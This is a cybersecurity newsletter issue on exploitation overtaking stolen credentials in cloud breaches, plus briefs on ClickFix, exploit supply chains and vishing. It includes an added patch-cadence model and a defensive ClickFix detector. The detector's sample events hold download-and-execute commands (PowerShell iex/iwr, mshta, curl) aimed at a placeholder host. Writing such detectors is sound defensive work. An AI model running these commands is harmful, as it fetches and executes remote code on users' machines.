THE ECHO

One story. Gone deep.

Your Patching Window Just Collapsed

For years, the conventional wisdom was clean: attackers don't hack in — they log in. Stolen credentials. Phished passwords. Compromised MFA. Identity is the perimeter.

That was true. It's not anymore.

Google Cloud's 2026 Threat Horizons Report — built on Mandiant's incident response data — puts a number on the shift: 44.5% of cloud breaches now start with exploited vulnerabilities. Stolen credentials dropped to 27%. Exploitation just overtook credentials as the number one breach vector. First time ever.

The reversal has been building. Mandiant's data shows the time from vulnerability disclosure to active exploitation has compressed from weeks to days. Sometimes hours. We talked about CrowdStrike's 29-minute breakout stat in Pulse #05 — that was lateral movement speed. This is the step before that. The front door is getting kicked in faster than most organizations can read the advisory.

Here's where the structural problem lives. Most organizations still run vulnerability management on a monthly cadence. Monthly scans. Monthly prioritization meetings. Monthly patch windows coordinated with change advisory boards that meet — you guessed it — monthly.

A monthly program against a daily threat isn't behind schedule. It's mathematically certain to lose.
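To make the arithmetic behind that claim visible, here is an added toy model (not from the newsletter; the stage schedules, the stagger offsets and the exploit lags are assumptions for illustration) that hands a freshly disclosed vulnerability through the three stages the paragraph describes, scan, prioritization meeting and patch window, each on its own fixed schedule, and measures how often an exploit arrives before the patch does:

```python
"""Toy exposure model for a staged vulnerability-management pipeline.

Added example, not from the newsletter. Each stage (scan, prioritization,
patch window) runs on its own fixed schedule, and a stage only picks up a
vulnerability that arrived strictly before its run. For a vulnerability
disclosed on a uniformly random day we measure days-to-patch and how often
an exploit landing `exploit_lag_days` after disclosure beats the patch.
All periods, offsets and lags below are assumptions for illustration.
"""
from statistics import median

# Each stage is (period_days, offset_days): it runs on days k*period + offset.
MONTHLY_ALIGNED = [(30, 0), (30, 0), (30, 0)]     # scan, CAB and patch window on the same day
MONTHLY_STAGGERED = [(30, 0), (30, 7), (30, 14)]  # CAB a week after the scan, patching a week after CAB
WEEKLY = [(7, 0), (7, 0), (7, 0)]
DAILY = [(1, 0), (1, 0), (1, 0)]                  # continuous scanning, same-day triage and deployment


def next_run(t: int, period: int, offset: int = 0) -> int:
    """Day of the first run of a stage strictly after day t."""
    k = (t - offset) // period + 1
    return k * period + offset


def days_to_patch(disclosure_day: int, stages) -> int:
    """Hand the vulnerability from stage to stage; each hop waits for that stage's next run."""
    t = disclosure_day
    for period, offset in stages:
        t = next_run(t, period, offset)
    return t - disclosure_day


def exposure_stats(stages, exploit_lag_days: int, horizon_days: int = 420) -> dict:
    """Sweep the disclosure day over `horizon_days` (420 is a multiple of both 7
    and 30, so weekly and monthly schedules are sampled evenly) and summarize."""
    exposures = [days_to_patch(d, stages) for d in range(horizon_days)]
    exploited_first = sum(1 for e in exposures if exploit_lag_days < e)
    return {
        "median_days": median(exposures),
        "max_days": max(exposures),
        "p_exploited_first": exploited_first / horizon_days,
    }


if __name__ == "__main__":
    scenarios = [("monthly, aligned", MONTHLY_ALIGNED), ("monthly, staggered", MONTHLY_STAGGERED),
                 ("weekly", WEEKLY), ("daily", DAILY)]
    for name, stages in scenarios:
        for lag in (42, 3):  # "weeks" (the old regime) vs "days" (today)
            s = exposure_stats(stages, lag)
            print(f"{name:20s} lag={lag:2d}d  median={s['median_days']:5.1f}d  "
                  f"max={s['max_days']:3d}d  exploited first: {s['p_exploited_first']:.0%}")
```

The number to watch is that days-to-patch is roughly the sum of the stage periods, not the longest one: three aligned monthly stages give a 61 to 90 day window, and even a weekly pipeline loses every time once the exploit lag is three days. Three daily stages still leave a three-day window, which is why the fix is collapsing stages and the approvals between them, not just running the same meetings more often.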

The question that matters isn't technical — it's governance. Who owns your patching cadence? Is it an IT operations decision managed alongside server uptime and change windows? Or is it a risk management decision reviewed at the same level as financial exposure? Because when exploitation overtakes credentials, your patching cadence is a direct measure of your breach exposure. Not indirect. Not a contributing factor. The primary one.

If your vulnerability management program reports into IT operations and nobody at the leadership level has reviewed the patching cadence in the last quarter — that's not a gap. That's a sign you need help. Not more tools. Not a faster scanner. Someone who can elevate that conversation to where the risk decisions actually get made.

SIGNAL CHECK

What else matters this week.

CISO Personal Liability Concerns Jump to 78%

Splunk's 2026 CISO Report says 78% of CISOs now cite personal liability as a top concern — a 22-point increase year-over-year. CISOs are declining roles, requiring personal liability insurance before accepting positions, and some are walking away from the title entirely. We wrote about this governance gap two weeks ago: the structural flaw where the CISO carries personal liability but the board controls the budget. The industry just put a number on it. If you can't attract or retain senior security leadership, the reason might not be compensation. It might be structure. via Splunk

Government-Grade Exploits Are Now Criminal Tools

Google's Threat Analysis Group tracked 23 separate exploits — originally developed by a commercial surveillance vendor — through a supply chain that should concern everyone. The path: surveillance vendor to Russian intelligence services to Chinese cybercriminal groups. Eighteen months from government tool to criminal commodity. The chain now targets iOS devices running versions below 17.3, primarily for cryptocurrency theft. Your assumption that nation-state tools stay with nation-states is dead. The exploit supply chain doesn't respect classification levels. It follows money. via Google TAG

ClickFix Hits 53% of All Malware Infections

We flagged ClickFix in Pulse #05 — now Huntress Labs confirms copy-paste social engineering has become the dominant infection vector. 53% of all malware infections. Eighteen months from novel technique to majority. No vulnerability, no zero-day — the user runs the command themselves. Endpoint protection can't stop the user from pasting the command, and it only gets a look once whatever the pasted command spawns does something it recognizes. This is a training problem dressed up as a technical one. via Huntress Labs
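Training reduces the pastes; telemetry is how you find the ones that happen anyway. As an added example (not from the newsletter or from Huntress), here is a scoring rule over process-creation events that catches the paste after the fact. It assumes the lure is pasted into the Win+R dialog or a terminal, so the first process is a system binary spawned from explorer.exe with a download-and-run command line, often with the lure's "not a robot" comment still attached. The field names follow Sysmon Event ID 1; the sample events are constructed, and the weights and threshold are assumptions to tune against your own baseline.

```python
"""Scoring rule for ClickFix-style executions in process-creation telemetry.

Added example, not from the newsletter or from Huntress. Field names follow
Sysmon Event ID 1 (ParentImage, Image, CommandLine); any EDR feed exposing the
same three fields works. Sample events are constructed, and the weights and
the threshold are assumptions to tune against your own baseline.
"""
import re

INTERACTIVE_PARENTS = {"explorer.exe"}  # Win+R and the Explorer address bar both spawn from explorer.exe
GATE_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
               "wscript.exe", "cscript.exe", "curl.exe"}

# (weight, label, pattern); all patterns are matched case-insensitively
INDICATORS = [
    (2, "download cradle", re.compile(
        r"\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
        r"|downloadstring|curl|certutil)\b|\bmshta\b[^\n]*https?://", re.I)),
    (1, "hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    (2, "encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    (1, "policy bypass / no profile", re.compile(r"-(?:ep|executionpolicy)\s+bypass\b|-nop\b|-noprofile\b", re.I)),
    (3, "captcha-lure comment", re.compile(r"i am not a robot|recaptcha|verification id|verify you are human|\u2705", re.I)),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Images outside the gate score 0 so the rule stays cheap."""
    if basename(ev["Image"]) not in GATE_IMAGES:
        return 0, []
    score, reasons = 0, []
    if basename(ev["ParentImage"]) in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("interactive parent")
    for weight, label, pattern in INDICATORS:
        if pattern.search(ev["CommandLine"]):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events, threshold: int = 4):
    """(index, score, reasons) for every event at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed sample events, not real telemetry; hosts use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,            # classic paste: cradle + lure comment
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'http://cdn.example.invalid/v.ps1' -UseBasicParsing)\" "
                    "# \u2705 \"I am not a robot - reCAPTCHA Verification ID: 7624\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta"},     # remote HTA from the Run dialog
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},          # admin script: benign
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,     # suspicious, but not a user paste
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s https://cdn.example.invalid/a.exe -o %TEMP%\a.exe && %TEMP%\a.exe"},
]

if __name__ == "__main__":
    for i, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {', '.join(reasons)}")
```

The encoded-but-non-interactive event deliberately stays under the threshold: it deserves its own rule, and folding it in here would just make this one noisy. If an alert fires, the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key on the host records what was typed into Win+R, so the full pasted lure is usually recoverable for the investigation.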

Cybercrime Recruiting on Telegram — $1,000 Per Call

A group called SLH is publicly recruiting women on Telegram for vishing operations. Prepared scripts. IT help desk targets. $500 to $1,000 per successful call. They're paying a premium for female voices specifically to enhance social engineering credibility. Cybercrime as gig economy — public recruitment, published pay scales. Same lesson as ClickFix: when your people are the perimeter, your training is your firewall. And your help desk is your authentication boundary — treat it like one. via Dataminr, The Hacker News

THE NOISE

Not every signal needs action.

"AI Will Replace All Security Analysts by 2028"

Every quarter, a new report predicts the end of the security analyst. This quarter's flavor: AI-powered SOCs will make human analysts obsolete within two years. The same industry that can't automate patch management is going to fully automate threat detection. AI is a force multiplier for analysts, not a replacement. It makes good analysts faster. It doesn't make zero analysts sufficient. Anyone telling you otherwise is selling the replacement.

ONE QUESTION

No answer. Just the question.

Exploitation just overtook credentials as the #1 breach vector. When was the last time your patching cadence was reviewed as a board-level risk decision — not an IT operations task?

Michael Faas is a fractional CTO/CISO helping growth-stage companies navigate complexity without building bloated security programs. More at echocyber.io.
